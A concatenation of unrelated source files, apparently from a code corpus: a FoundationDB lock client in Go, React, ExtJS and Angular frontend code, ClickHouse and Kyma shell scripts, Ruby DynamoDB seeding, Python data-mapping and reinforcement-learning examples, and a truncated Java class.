controllers "github.com/FoundationDB/fdb-kubernetes-operator/controllers"
"github.com/apple/foundationdb/bindings/go/src/fdb"
"github.com/apple/foundationdb/bindings/go/src/fdb/tuple"
)
// realLockClient provides a client for managing operation locks through
// the database. Locks are stored under the cluster's lock prefix as a
// tuple of (ownerID, startTime, endTime).
type realLockClient struct {
	// cluster is the cluster we are managing locks for.
	cluster *fdbtypes.FoundationDBCluster

	// disableLocks indicates whether locking is disabled entirely, in
	// which case every lock request is granted without touching the
	// database.
	disableLocks bool

	// database is the connection to the database holding the locks.
	database fdb.Database
}
// Disabled determines if the client should automatically grant locks,
// i.e. whether locking is disabled for the cluster.
func (client *realLockClient) Disabled() bool {
	return client.disableLocks
}
// TakeLock attempts to acquire a lock. It returns true immediately when
// locking is disabled; otherwise it runs the lock protocol in a single
// transaction and reports whether this cluster now holds the lock.
func (client *realLockClient) TakeLock() (bool, error) {
	if client.disableLocks {
		return true, nil
	}

	hasLock, err := client.database.Transact(func(transaction fdb.Transaction) (interface{}, error) {
		return client.takeLockInTransaction(transaction)
	})
	if err != nil {
		return false, err
	}

	// Guard the type assertion instead of panicking on an unexpected
	// transaction result, mirroring the check in GetPendingUpgrades.
	result, ok := hasLock.(bool)
	if !ok {
		return false, fmt.Errorf("invalid return value from lock transaction: %v", hasLock)
	}
	return result, nil
}
// takeLockInTransaction attempts to acquire a lock using an open
// transaction. It returns true when this cluster sets the initial lock,
// reclaims an expired or denied lock, or already owns the lock.
func (client *realLockClient) takeLockInTransaction(transaction fdb.Transaction) (bool, error) {
	// The lock lives in the system keyspace.
	err := transaction.Options().SetAccessSystemKeys()
	if err != nil {
		return false, err
	}

	lockKey := fdb.Key(fmt.Sprintf("%s/global", client.cluster.GetLockPrefix()))
	lockValue := transaction.Get(lockKey).MustGet()

	// No lock exists yet: claim it immediately.
	if len(lockValue) == 0 {
		log.Info("Setting initial lock")
		client.updateLock(transaction, 0)
		return true, nil
	}

	// The stored value is a tuple of (ownerID string, startTime int64,
	// endTime int64); anything else is treated as corrupt.
	lockTuple, err := tuple.Unpack(lockValue)
	if err != nil {
		return false, err
	}
	if len(lockTuple) < 3 {
		return false, invalidLockValue{key: lockKey, value: lockValue}
	}

	ownerID, valid := lockTuple[0].(string)
	if !valid {
		return false, invalidLockValue{key: lockKey, value: lockValue}
	}

	startTime, valid := lockTuple[1].(int64)
	if !valid {
		return false, invalidLockValue{key: lockKey, value: lockValue}
	}

	endTime, valid := lockTuple[2].(int64)
	if !valid {
		return false, invalidLockValue{key: lockKey, value: lockValue}
	}

	cluster := client.cluster

	// A deny-list entry for our own ID blocks us from taking the lock.
	newOwnerDenied := transaction.Get(client.getDenyListKey(cluster.GetLockID())).MustGet() != nil
	if newOwnerDenied {
		log.Info("Failed to get lock due to deny list", "namespace", cluster.Namespace, "cluster", cluster.Name)
		return false, nil
	}

	// Reclaim the lock if it has expired or its current owner is denied.
	oldOwnerDenied := transaction.Get(client.getDenyListKey(ownerID)).MustGet() != nil
	shouldClear := endTime < time.Now().Unix() || oldOwnerDenied
	if shouldClear {
		log.Info("Clearing expired lock", "namespace", cluster.Namespace, "cluster", cluster.Name, "owner", ownerID, "startTime", time.Unix(startTime, 0), "endTime", time.Unix(endTime, 0))
		client.updateLock(transaction, startTime)
		return true, nil
	}

	// We already hold the lock: extend it.
	if ownerID == client.cluster.GetLockID() {
		log.Info("Extending previous lock", "namespace", cluster.Namespace, "cluster", cluster.Name, "owner", ownerID, "startTime", time.Unix(startTime, 0), "endTime", time.Unix(endTime, 0))
		client.updateLock(transaction, startTime)
		return true, nil
	}

	// Someone else holds a live lock.
	log.Info("Failed to get lock", "namespace", cluster.Namespace, "cluster", cluster.Name, "owner", ownerID, "startTime", time.Unix(startTime, 0), "endTime", time.Unix(endTime, 0))
	return false, nil
}
// updateLock writes the lock tuple claiming the lock for this cluster.
// A zero start means the lock period begins now; otherwise the caller's
// start time is preserved. The expiry is always now plus the cluster's
// configured lock duration.
func (client *realLockClient) updateLock(transaction fdb.Transaction, start int64) {
	key := fdb.Key(fmt.Sprintf("%s/global", client.cluster.GetLockPrefix()))

	if start == 0 {
		start = time.Now().Unix()
	}
	expiry := time.Now().Add(client.cluster.GetLockDuration()).Unix()

	value := tuple.Tuple{
		client.cluster.GetLockID(),
		start,
		expiry,
	}
	log.Info("Setting new lock", "namespace", client.cluster.Namespace, "cluster", client.cluster.Name, "lockValue", value)
	transaction.Set(key, value.Pack())
}
// AddPendingUpgrades registers information about which process groups
// are pending an upgrade to a new version, storing one key per process
// group under the cluster's lock prefix.
func (client *realLockClient) AddPendingUpgrades(version fdbtypes.FdbVersion, processGroupIDs []string) error {
	_, err := client.database.Transact(func(tr fdb.Transaction) (interface{}, error) {
		if err := tr.Options().SetAccessSystemKeys(); err != nil {
			return nil, err
		}
		prefix := client.cluster.GetLockPrefix()
		for _, groupID := range processGroupIDs {
			upgradeKey := fdb.Key(fmt.Sprintf("%s/upgrades/%s/%s", prefix, version.String(), groupID))
			tr.Set(upgradeKey, []byte(groupID))
		}
		return nil, nil
	})
	return err
}
// GetPendingUpgrades returns the stored information about which process
// groups are pending an upgrade to the given version, as a set keyed by
// process group ID.
func (client *realLockClient) GetPendingUpgrades(version fdbtypes.FdbVersion) (map[string]bool, error) {
	raw, err := client.database.Transact(func(tr fdb.Transaction) (interface{}, error) {
		if err := tr.Options().SetReadSystemKeys(); err != nil {
			return nil, err
		}

		prefix := []byte(fmt.Sprintf("%s/upgrades/%s/", client.cluster.GetLockPrefix(), version.String()))
		upgradeRange, err := fdb.PrefixRange(prefix)
		if err != nil {
			return nil, err
		}

		entries := tr.GetRange(upgradeRange, fdb.RangeOptions{}).GetSliceOrPanic()
		pending := make(map[string]bool, len(entries))
		for _, entry := range entries {
			pending[string(entry.Value)] = true
		}
		return pending, nil
	})
	if err != nil {
		return nil, err
	}

	pending, ok := raw.(map[string]bool)
	if !ok {
		return nil, fmt.Errorf("invalid return value from transaction in GetPendingUpgrades: %v", raw)
	}
	return pending, nil
}
// ClearPendingUpgrades clears any stored information about pending
// upgrades, across all versions, by removing every key under the
// cluster's upgrade prefix.
func (client *realLockClient) ClearPendingUpgrades() error {
	_, err := client.database.Transact(func(tr fdb.Transaction) (interface{}, error) {
		if err := tr.Options().SetAccessSystemKeys(); err != nil {
			return nil, err
		}
		upgradeRange, err := fdb.PrefixRange([]byte(fmt.Sprintf("%s/upgrades/", client.cluster.GetLockPrefix())))
		if err != nil {
			return nil, err
		}
		tr.ClearRange(upgradeRange)
		return nil, nil
	})
	return err
}
// GetDenyList retrieves the current deny list from the database.
func (client *realLockClient) GetDenyList() ([]string, error) {
	list, err := client.database.Transact(func(tr fdb.Transaction) (interface{}, error) {
		err := tr.Options().SetReadSystemKeys()
		if err != nil {
			return nil, err
		}

		keyRange, err := client.getDenyListKeyRange()
		if err != nil {
			return nil, err
		}

		values := tr.GetRange(keyRange, fdb.RangeOptions{}).GetSliceOrPanic()
		list := make([]string, len(values))
		for index, value := range values {
			list[index] = string(value.Value)
		}
		return list, nil
	})
	if err != nil {
		return nil, err
	}

	// Guard the assertion instead of panicking on an unexpected result,
	// consistent with the check in GetPendingUpgrades.
	denyList, isList := list.([]string)
	if !isList {
		return nil, fmt.Errorf("invalid return value from transaction in GetDenyList: %v", list)
	}
	return denyList, nil
}
// UpdateDenyList updates the deny list to match a list of entries.
// Entries with Allow=true are removed from the stored deny list and
// entries with Allow=false are added; IDs not mentioned are untouched.
func (client *realLockClient) UpdateDenyList(locks []fdbtypes.LockDenyListEntry) error {
	_, err := client.database.Transact(func(tr fdb.Transaction) (interface{}, error) {
		err := tr.Options().SetAccessSystemKeys()
		if err != nil {
			return nil, err
		}

		keyRange, err := client.getDenyListKeyRange()
		if err != nil {
			return nil, err
		}

		// Snapshot the stored deny list so we only issue writes that
		// actually change state.
		values := tr.GetRange(keyRange, fdb.RangeOptions{}).GetSliceOrPanic()
		denyListMap := make(map[string]bool, len(values))
		for _, value := range values {
			denyListMap[string(value.Value)] = true
		}

		for _, entry := range locks {
			if entry.Allow && denyListMap[entry.ID] {
				tr.Clear(client.getDenyListKey(entry.ID))
			} else if !entry.Allow && !denyListMap[entry.ID] {
				tr.Set(client.getDenyListKey(entry.ID), []byte(entry.ID))
			}
		}

		return nil, nil
	})
	return err
}
// getDenyListKeyRange defines a key range containing the full deny list
// for this cluster's lock prefix.
func (client *realLockClient) getDenyListKeyRange() (fdb.KeyRange, error) {
	keyPrefix := []byte(fmt.Sprintf("%s/denyList/", client.cluster.GetLockPrefix()))
	return fdb.PrefixRange(keyPrefix)
}
// getDenyListKey returns the key containing a potential deny list entry
// for an owner ID.
func (client *realLockClient) getDenyListKey(id string) fdb.Key {
	return fdb.Key(fmt.Sprintf("%s/denyList/%s", client.cluster.GetLockPrefix(), id))
}
// invalidLockValue is an error we can return when we cannot parse the
// existing values in the locking system.
type invalidLockValue struct {
	// key is the database key whose value failed to parse.
	key fdb.Key

	// value is the raw, undecodable value stored at key.
	value []byte
}
// Error formats the error message describing the undecodable lock entry.
// The value is quoted with %q since it is raw binary data that may not be
// printable, and the message is lowercase per Go error string convention.
func (err invalidLockValue) Error() string {
	return fmt.Sprintf("could not decode value %q for key %q", err.value, err.key)
}
// NewRealLockClient creates a lock client for the given cluster. When the
// cluster is not configured to use locks, the returned client grants all
// lock requests without a database connection; otherwise the shared
// database connection is obtained via getFDBDatabase (defined elsewhere
// in this package).
func NewRealLockClient(cluster *fdbtypes.FoundationDBCluster) (controllers.LockClient, error) {
	if !cluster.ShouldUseLocks() {
		return &realLockClient{disableLocks: true}, nil
	}

	database, err := getFDBDatabase(cluster)
	if err != nil {
		return nil, err
	}

	return &realLockClient{cluster: cluster, database: database}, nil
}
|
<filename>src/components/login/LoginForm.tsx
import { Link } from "react-router-dom";
import styled from "styled-components";
import { theme } from "styled-tools";
import { IdIcon, PwIcon } from "assets";
// Login form: id/password inputs decorated with icons, plus a
// link-styled login button.
// NOTE(review): the button navigates straight to /main/dashboard via
// <Link> without submitting or validating the form — confirm whether
// real authentication is wired up elsewhere.
export default function LoginWrapper() {
  return (
    <form>
      <StInput>
        <IdIcon />
        <input id="id" placeholder="아이디를 입력해주세요" />
      </StInput>
      <StInput>
        <PwIcon />
        <input id="pw" type="password" placeholder="비밀번호를 입력해주세요" />
      </StInput>
      <StLoginButton>
        <Link to="/main/dashboard">로그인</Link>
      </StLoginButton>
    </form>
  );
}
// Bordered input row: leading icon on the left, text input beside it.
const StInput = styled.div`
  display: flex;
  align-items: center;
  border-radius: 0.4rem;
  border: 1px solid ${theme("colors.chartLineGray")};
  background-color: ${theme("colors.pointWhite")};
  width: 36.9rem;
  height: 4.5rem;
  margin-bottom: 2.7rem;

  /* leading icon */
  & > svg {
    width: 1.9rem;
    margin: 1.2rem 0 1.2rem 2rem;
  }

  /* text input sits right of the icon */
  & > input {
    margin-left: 1.2rem;
  }
`;
// Button-shaped container for the login link, matching the input rows'
// width and height.
const StLoginButton = styled.p`
  display: flex;
  justify-content: center;
  align-items: center;
  background-color: ${theme("colors.mainColor")};
  border-radius: 0.4rem;
  width: 36.9rem;
  height: 4.5rem;
  margin-top: 1.2rem;

  /* the react-router link is the visible label */
  & > a {
    text-align: center;
    ${theme("fonts.korBold")};
    color: ${theme("colors.pointWhite")};
  }
`;
|
set -o errexit

# Export the cluster's ingress TLS certificate from the net-global-overrides
# ConfigMap and register it as a trusted root in the macOS system keychain.
# Expansions are quoted to survive paths with spaces (shellcheck SC2086).
tmpfile=$(mktemp /tmp/temp-cert.XXXXXX) \
&& kubectl get configmap net-global-overrides -n kyma-installer -o jsonpath='{.data.global\.ingress\.tlsCrt}' | base64 --decode > "$tmpfile" \
&& sudo security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain "$tmpfile" \
&& rm "$tmpfile"

# Generate the Tiller TLS client certificates.
sh "$GOPATH"/src/github.com/kyma-project/kyma/installation/scripts/tiller-tls.sh

echo "Certificates provided."
<gh_stars>1-10
Scalr.regPage('Scalr.ui.tools.cloudstack.volumes.view', function (loadParams, moduleParams) {
var store = Ext.create('store.store', {
fields: [
'farmId', 'farmRoleId', 'farmName', 'roleName', 'mysql_master_volume', 'mountStatus', 'serverIndex', 'serverId',
'volumeId', 'size', 'type', 'storage', 'status', 'attachmentStatus', 'device', 'instanceId', 'autoSnaps', 'autoAttach'
],
proxy: {
type: 'scalr.paging',
url: '/tools/cloudstack/volumes/xListVolumes/'
},
remoteSort: true
});
return Ext.create('Ext.grid.Panel', {
scalrOptions: {
reload: true,
maximize: 'all',
menuTitle: Scalr.utils.getPlatformName(loadParams['platform']) + ' » Volumes',
//menuFavorite: true
},
store: store,
stateId: 'grid-tools-cloudstack-volumes-view',
stateful: true,
plugins: [{
ptype: 'gridstore'
}, {
ptype: 'applyparams',
filterIgnoreParams: [ 'platform' ]
}],
viewConfig: {
emptyText: 'No volumes found',
loadingText: 'Loading volumes ...'
},
columns: [
{ header: "Used by", flex: 1, dataIndex: 'farmId', sortable: false, xtype: 'templatecolumn', tpl:
'<tpl if="farmId">' +
'<a href="#/farms?farmId={farmId}" title="Farm {farmName}">{farmName}</a>' +
'<tpl if="roleName">' +
' → <a href="#/farms/{farmId}/roles/{farmRoleId}/view" title="Role {roleName}">' +
'{roleName}</a> #<a href="#/servers?serverId={serverId}">{serverIndex}</a>' +
'</tpl>' +
'</tpl>' +
'<tpl if="!farmId">—</tpl>'
},
{ header: "Volume ID", width: 110, dataIndex: 'volumeId', sortable: true },
{ header: "Size (GB)", width: 110, dataIndex: 'size', sortable: true },
{ header: "Type", width: 150, dataIndex: 'type', sortable: true},
{ header: "Storage", width: 120, dataIndex: 'storage', sortable: true },
{ header: "Status", width: 180, dataIndex: 'status', sortable: true, xtype: 'templatecolumn', tpl:
'{status}' +
'<tpl if="attachmentStatus"> / {attachmentStatus}</tpl>' +
'<tpl if="device"> ({device})</tpl>'
},
{ header: "Mount status", width: 110, dataIndex: 'mountStatus', sortable: false, xtype: 'templatecolumn', tpl:
'<tpl if="mountStatus">{mountStatus}</tpl>' +
'<tpl if="!mountStatus">—</tpl>'
},
{ header: "Instance ID", width: 115, dataIndex: 'instanceId', sortable: true, xtype: 'templatecolumn', tpl:
'<tpl if="instanceId">{instanceId}</tpl>'
},
{ header: "Auto-snaps", width: 110, dataIndex: 'autoSnaps', sortable: false, align:'center', xtype: 'templatecolumn', tpl:
'<tpl if="autoSnaps"><div class="x-grid-icon x-grid-icon-simple x-grid-icon-ok"></div></tpl>' +
'<tpl if="!autoSnaps">—</tpl>'
},
{ header: "Auto-attach", width: 130, dataIndex: 'autoAttach', sortable: false, align:'center', xtype: 'templatecolumn', tpl:
'<tpl if="autoAttach"><div class="x-grid-icon x-grid-icon-simple x-grid-icon-ok"></div></tpl>' +
'<tpl if="!autoAttach">—</tpl>'
}
],
selModel: Scalr.isAllowed('CLOUDSTACK_VOLUMES', 'manage') ? 'selectedmodel' : null,
listeners: {
selectionchange: function(selModel, selections) {
this.down('scalrpagingtoolbar').down('#delete').setDisabled(!selections.length);
}
},
dockedItems: [{
xtype: 'scalrpagingtoolbar',
store: store,
dock: 'top',
afterItems: [{
itemId: 'delete',
iconCls: 'x-btn-icon-delete',
cls: 'x-btn-red',
tooltip: 'Select one or more volume(s) to delete them',
disabled: true,
hidden: !Scalr.isAllowed('CLOUDSTACK_VOLUMES', 'manage'),
handler: function() {
var request = {
confirmBox: {
type: 'delete',
msg: 'Delete selected volume(s): %s ?'
},
processBox: {
type: 'delete',
msg: 'Deleting volume(s) ...'
},
url: '/tools/cloudstack/volumes/xRemove/',
success: function() {
store.load();
}
}, records = this.up('grid').getSelectionModel().getSelection(), data = [];
request.confirmBox.objects = [];
for (var i = 0, len = records.length; i < len; i++) {
data.push(records[i].get('volumeId'));
request.confirmBox.objects.push(records[i].get('volumeId'));
}
request.params = { volumeId: Ext.encode(data), cloudLocation: store.proxy.extraParams.cloudLocation, platform: store.proxy.extraParams.platform };
Scalr.Request(request);
}
}],
items: [{
xtype: 'filterfield',
store: store
}, ' ', {
xtype: 'cloudlocationfield',
platforms: [loadParams['platform']],
gridStore: store
}]
}]
});
});
|
require 'tracer_client/errors/application_error'

# Marker error subclass: adds no behavior beyond ApplicationError, but
# lets callers raise and rescue logic failures as a distinct type.
class LogicError < ApplicationError
end
|
#!/usr/bin/env bash

# Functional test for the output_format_json_quote_64bit_integers setting,
# exercised via CLI flags, readonly CLI sessions, HTTP URL parameters, and
# a readonly HTTP session. The greps keep only the relevant output lines
# ("value" rows or the readonly rejection message) so the reference file
# stays stable.
CLICKHOUSE_LOG_COMMENT=''

CURDIR=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)
# shellcheck source=../shell_config.sh
. "$CURDIR"/../shell_config.sh

# CLI: the same UInt64 value with quoting disabled, then enabled.
$CLICKHOUSE_CLIENT --query="select toUInt64(pow(2, 62)) as value format JSON" --output_format_json_quote_64bit_integers=0 | grep value
$CLICKHOUSE_CLIENT --query="select toUInt64(pow(2, 62)) as value format JSON" --output_format_json_quote_64bit_integers=1 | grep value

# CLI readonly: either the query runs or the SET is rejected; the grep
# accepts both alternatives and the reference file pins the expected one.
$CLICKHOUSE_CLIENT --readonly=1 --multiquery --query="set output_format_json_quote_64bit_integers=1 ; select toUInt64(pow(2, 63)) as value format JSON" --server_logs_file=/dev/null 2>&1 | grep -o 'value\|Cannot modify .* setting in readonly mode'
$CLICKHOUSE_CLIENT --readonly=1 --multiquery --query="set output_format_json_quote_64bit_integers=0 ; select toUInt64(pow(2, 63)) as value format JSON" --server_logs_file=/dev/null 2>&1 | grep -o 'value\|Cannot modify .* setting in readonly mode'

# HTTP: the setting passed as a URL parameter.
${CLICKHOUSE_CURL} -sS "${CLICKHOUSE_URL}&query=SELECT+toUInt64(pow(2,+63))+as+value+format+JSON&output_format_json_quote_64bit_integers=1" | grep value
${CLICKHOUSE_CURL} -sS "${CLICKHOUSE_URL}&query=SELECT+toUInt64(pow(2,+63))+as+value+format+JSON&output_format_json_quote_64bit_integers=0" | grep value

# HTTP readonly session: make the session readonly, then retry with the
# setting as a URL parameter.
${CLICKHOUSE_CURL} -sS "${CLICKHOUSE_URL}&session_id=readonly&session_timeout=3600" -d 'SET readonly = 1'
${CLICKHOUSE_CURL} -sS "${CLICKHOUSE_URL}&session_id=readonly&query=SELECT+toUInt64(pow(2,+63))+as+value+format+JSON&output_format_json_quote_64bit_integers=1" 2>&1 | grep -o 'value\|Cannot modify .* setting in readonly mode.'
${CLICKHOUSE_CURL} -sS "${CLICKHOUSE_URL}&session_id=readonly&query=SELECT+toUInt64(pow(2,+63))+as+value+format+JSON&output_format_json_quote_64bit_integers=0" 2>&1 | grep -o 'value\|Cannot modify .* setting in readonly mode'
|
# Print nine lines forming a left-aligned triangle: line i (i = 1..9)
# holds i - 1 asterisks, so the first printed line is empty and the last
# has eight stars — identical output to the original nested-loop version.
for row in range(1, 10):
    print("*" * (row - 1))
import numpy as np
import networkx as nx
import re
class article_to_category():
    """
    Maps Wikipedia articles to a category vector which can then be used as a
    content vector for content-based recommender systems.

    To run this class you need to have run some of the functions in
    wiki_categories.py to create the graph links and category index.

    Example of the class being run:
    -----------
    from pyspark.sql.types import StructType
    import json
    import pickle

    # load and create the files necessary
    category_idx = pickle.load( open("category_index.p", 'rb'))
    high_level_categories = ['Geography', 'Health', 'History', 'Humanities', 'Literature', 'Mathematics', \
                             'Nature', 'People', 'Philosophy', 'Reference_works', 'Science', 'Technology']
    ac = article_to_category(high_level_categories, "category_index_graph_link", category_idx)

    # bring in the wikipedia edits, using the json schema if you have it as it is a lot faster!
    with open('wikipedia_full_text_schema.json', 'r') as json_schema_file:
        schema = StructType.fromJson(json.load(json_schema_file))
    wiki_rdd = sqlCtx.read.json('wiki_edits.json.gz', schema = schema)
    article_mapping = ac.run_mapping(wiki_rdd)
    -----------

    NOTE: run_mapping uses a tuple-unpacking lambda, which is Python 2-only
    syntax, so this module must run under a Python 2 Spark environment.
    """

    def __init__(self, high_level_categories, category_index_graph_link, category_idx):
        """
        Class initializer that loads the required files.

        Args:
            high_level_categories: array of the high level categories to map
                to, e.g. ['Concepts', 'Life', 'Physical_universe', 'Society']
            category_index_graph_link: path to the csv of the category links
                as created from wiki_categories.create_linked_list()
            category_idx: dictionary of category name -> index as created
                from wiki_categories.create_category_idx_dicts()
        """
        # If the names do not have the 'Category:' prefix (as in the example
        # above) we must add it so they match the keys of category_idx.
        main_topics = ['Category:' +a for a in high_level_categories]
        self.high_level_idx = [category_idx[a] for a in main_topics]

        # Load the Wikipedia category graph from the graph link. This is
        # assumed to be a csv file created using code from
        # wiki_categories.create_linked_list().
        dg = nx.DiGraph()
        self.category_index_graph = nx.read_adjlist(category_index_graph_link, 'rb', \
            create_using=dg ,delimiter=',', nodetype = int)
        self.category_idx = category_idx

    def run_mapping(self, wiki_rdd):
        """
        Maps articles in a wikipedia dump to the high level categories.
        Will only return articles with a findable category mapping, so will
        skip those articles without categories or for whom the mapping could
        otherwise not be found.

        Args:
            wiki_rdd: the full wikipedia text loaded into an RDD (likely
                through sqlCtx.read.json)
        Returns:
            article_map: RDD of [article_id, content_vector] pairs
        """
        # Filter out uninteresting articles.
        filtered_rdd = wiki_rdd.rdd.filter(
            lambda row:
                row.redirect_target is None # Save only edits that are not redirects
                and row.article_namespace == 0 # Save only edits on articles, not talk pages
                and row.full_text is not None # Has text
        )

        # Run the category mapping, dropping articles where the mapping was
        # not found (category_mapping returns None in that case).
        # NOTE: the tuple-unpacking lambda below is Python 2-only syntax.
        article_map = filtered_rdd.map(lambda row: (row.article_title, row.article_id, extract_categories(row.full_text))) \
            .map(lambda (article_title, article_id, cats): self.category_mapping(article_title, article_id, cats)) \
            .filter(lambda row: row != None)

        return article_map

    def category_mapping(self, article_title, article_id, cats):
        """
        Builds a content vector for one article from its categories, scaled
        to [0, 1] across the high level categories. Returns
        [article_id, content_vector], or None (implicitly) when the article
        has no categories or no usable mapping was found.

        NOTE(review): `self.category_idx[c]` is assumed to return [] for
        unknown categories (see the `cat_idx!=[]` check) — confirm
        category_idx is built that way, otherwise unknown names raise
        KeyError here.
        """
        parent_lengths_all = []

        # Only try to determine the category mapping if the article contains
        # categories; there are only a few articles without any.
        if len(cats)>0:
            for c in cats:
                c = clean_name(c)
                cat_idx = self.category_idx[c]
                # Sentinel distances used when the category cannot be
                # determined from the category index.
                parent_lengths = np.ones(len(self.high_level_idx))*1000000000
                if cat_idx!=[]:
                    parent_lengths = self.getParentArray(cat_idx)
                parent_lengths_all.append(parent_lengths)

            # A shorter path is better, so the shortest path will receive a 1
            # and the longest a 0, with the rest scaled in between. If there
            # is at least one array with real values (not the sentinel
            # vector) then the sentinel vectors are removed first; if there
            # are no arrays with values then no array is returned.
            if np.mean(parent_lengths_all, axis=0)[0]<1000000000:
                clean_list = []
                for pl in parent_lengths_all:
                    if pl[0]!=1000000000 and pl[0]!=0.:
                        clean_list.append(pl)
                avg = np.mean(clean_list, axis=0)
                min_val = min(avg)
                max_val = max(avg)
                diff = max_val-min_val
                # Avoid division by zero when all averaged distances match.
                if diff==0: diff=1
                content_vector = []
                for t in avg:
                    # NOTE(review): (t-min_val)**0 is always 1, so this
                    # reduces to (max_val-t)/diff — confirm whether a
                    # (t-min_val) weighting factor was intended here.
                    new_val = ((t-min_val)**0*(max_val-t))/diff
                    content_vector.append(new_val)
                return [article_id, content_vector]

    def getParentArray(self, catID):
        """
        From a given category ID, the function will find the shortest path
        to each entry of the high level index list. If a path from a top
        level category to the given category cannot be found, the distance
        will be the sentinel 1000000000.

        Args:
            catID: the originating category ID
        Returns:
            parent_lengths: the distances in the graph between the top level
                categories and the category ID
        """
        parent_lengths = []
        for main_idx in self.high_level_idx:
            dist = 1000000000
            try:
                # Paths are directed from the top level category down to
                # catID; len(paths) counts the nodes on that path.
                paths = nx.shortest_path(self.category_index_graph, main_idx, catID)
                dist = len(paths)
            except:
                # No path (or node missing from the graph): keep sentinel.
                pass
            parent_lengths.append(dist)
        return parent_lengths
def clean_name(catName):
    """
    Cleans the category name so that it matches the same format as the
    category list: spaces become underscores and the '\u2013' sequence is
    replaced with a plain hyphen.

    #TODO expand this list of cleans or determine encoding difference

    Args:
        catName: original category name as given in the wikipedia dump
    Returns:
        The cleaned category name which matches the dbPedia dump.
    """
    return catName.replace(' ', '_').replace('\u2013', '-')
def extract_categories(text):
    """Extract the Wikipedia categories from the full text of an article.

    Returns a list of strings enumerating the categories for a Wikipedia
    article by parsing the full text of the article. The strings are of
    the form "Category:Foo" and do not contain the opening or closing
    square brackets. If the article contains a sorting hint in the
    category (for example, "[[Category:Foo|Sorting Hint]]") those are
    removed before returning the category.

    How the pattern \[\[(Category:[^\[\]|]*) works: it anchors on the
    opening "[[", then captures "Category:" followed by every character
    up to (but not including) the first "[", "]" or "|". A trailing
    "|Sorting Hint]]" is therefore excluded automatically, and no closing
    "]]" needs to be located (it can be arbitrarily far away when a
    sorting hint is present).

    Args:
        text (str): The full text of a Wikipedia article in one string.

    Returns:
        list: The categories the page belongs to; empty if there are none.
    """
    category_pattern = r'\[\[(Category:[^\[\]|]*)'
    return re.findall(category_pattern, text)
import { NgModule } from '@angular/core';
import { Routes, RouterModule } from '@angular/router';
import { ColorsComponent } from './colors.component';
import { TypographyComponent } from './typography.component';
import { SchoolComponent } from './school.component';
import { TutorComponent } from './tutor/tutor.component';
import { MessageDetailComponent } from './message-detail/message-detail.component';
// Route table for the school feature area; the empty child path redirects
// to 'colors'.
// NOTE(review): the 'message' route renders ColorsComponent (title
// 'Colors') while 'typography' renders SchoolComponent — this looks like
// a copy/paste leftover; confirm the intended component for each path.
// The 'applictions' path is misspelled but kept as-is because existing
// links may depend on it.
const routes: Routes = [
  {
    path: '',
    data: {
      title: 'school'
    },
    children: [
      {
        path: '',
        redirectTo: 'colors',
        // Required for an empty-path redirect; without it Angular throws
        // an "Invalid configuration of route" error at startup.
        pathMatch: 'full'
      },
      {
        path: 'message',
        component: ColorsComponent,
        data: {
          title: 'Colors'
        }
      },
      {
        path: 'typography',
        component: SchoolComponent,
        data: {
          title: 'Typography'
        }
      },
      {
        path: 'applictions',
        component: SchoolComponent,
        data: {
          title: 'school'
        }
      },
      {
        path: 'tutor',
        component: TutorComponent,
        data: {
          title: 'tutor'
        }
      },
      {
        path: 'detailMessage/:parentId',
        component: MessageDetailComponent,
        data: {
          title: 'message'
        }
      }
    ]
  }
];
// Registers the routes above as child routes of this feature module and
// re-exports RouterModule so router directives are available to the
// components declared alongside it.
@NgModule({
  imports: [RouterModule.forChild(routes)],
  exports: [RouterModule]
})
export class ThemeRoutingModule {}
|
require 'csv'
require 'json'
require 'aws-sdk-dynamodb'
require 'securerandom'
# DynamoDB client bound to the election-simulation AWS profile in us-west-1.
dynamodb = Aws::DynamoDB::Client.new(region: 'us-west-1',
                                     profile: 'election-simulation')

# Candidate names (anonymized placeholders in this checked-in copy).
candidates = ["<NAME>", "<NAME>", "<NAME>", "<NAME>", "<NAME>"]

# The 50 US state abbreviations plus DC.
def state_array
  %w(AK AL AR AZ CA CO CT DC DE FL GA HI IA ID IL IN KS KY LA MA MD ME MI MN MO MS MT NC ND NE NH NJ NM NV NY OH OK OR PA RI SC SD TN TX UT VA VT WA WI WV WY)
end
# Seed the Results table with a zero vote count for every
# (candidate, state) pair so later counter increments never hit a missing
# item. Failures are reported per item but do not abort the run.
state_array.each do |state|
  candidates.each do |name|
    puts "#{name} #{state}"

    params = {
      table_name: 'Results',
      item: {
        candidate: name,
        state: state,
        count: 0
      }
    }

    begin
      # put_item's response is unused; errors are what matter here.
      dynamodb.put_item(params)
    rescue Aws::DynamoDB::Errors::ServiceError => error
      puts 'Unable to add state'
      puts params.to_json
      puts error.message
    end
  end
end

puts "finished"
|
<reponame>rsuite/rsuite-icons<filename>src/icons/legacy/CreditCardAlt.tsx
// Generated by script, don't edit it please.
// Binds the legacy "credit card alt" glyph from @rsuite/icon-font to the
// shared createSvgIcon factory, which supplies the aria label, category,
// and display name used by the rsuite icon system.
import createSvgIcon from '../../createSvgIcon';
import CreditCardAltSvg from '@rsuite/icon-font/lib/legacy/CreditCardAlt';

const CreditCardAlt = createSvgIcon({
  as: CreditCardAltSvg,
  ariaLabel: 'credit card alt',
  category: 'legacy',
  displayName: 'CreditCardAlt'
});

export default CreditCardAlt;
|
<gh_stars>0
import numpy as np
from mushroom.algorithms.value import QLearning
from mushroom.core import Core
from mushroom.environments import *
from mushroom.policy import EpsGreedy
from mushroom.utils.parameters import Parameter
"""
Simple script to solve a simple chain with Q-Learning.
"""
def experiment():
np.random.seed()
# MDP
mdp = generate_simple_chain(state_n=5, goal_states=[2], prob=.8, rew=1,
gamma=.9)
# Policy
epsilon = Parameter(value=.15)
pi = EpsGreedy(epsilon=epsilon)
# Agent
learning_rate = Parameter(value=.2)
algorithm_params = dict(learning_rate=learning_rate)
agent = QLearning(pi, mdp.info, **algorithm_params)
# Algorithm
core = Core(agent, mdp)
# Train
core.learn(n_steps=10000, n_steps_per_fit=1)
if __name__ == '__main__':
experiment()
|
<filename>src/domain/WishList.java<gh_stars>0
package domain;
import java.util.ArrayList;
/**
 * A registered user's wish list of products. The wish list's identity is
 * the owning user's id; {@code toDelete} temporarily holds the product
 * the caller has marked for removal.
 */
public class WishList extends DomainObject {

	// Initialized eagerly so instances created through the no-arg
	// constructor never expose a null list (previously getWishlist() /
	// setWishlist() would throw NullPointerException on that path).
	private ArrayList<Product> wishlist = new ArrayList<Product>();
	private RegisteredUser user;
	private Product toDelete;

	public WishList(RegisteredUser user) {
		this.user = user;
	}

	public WishList() {
	}

	/**
	 * Returns the owning user's id.
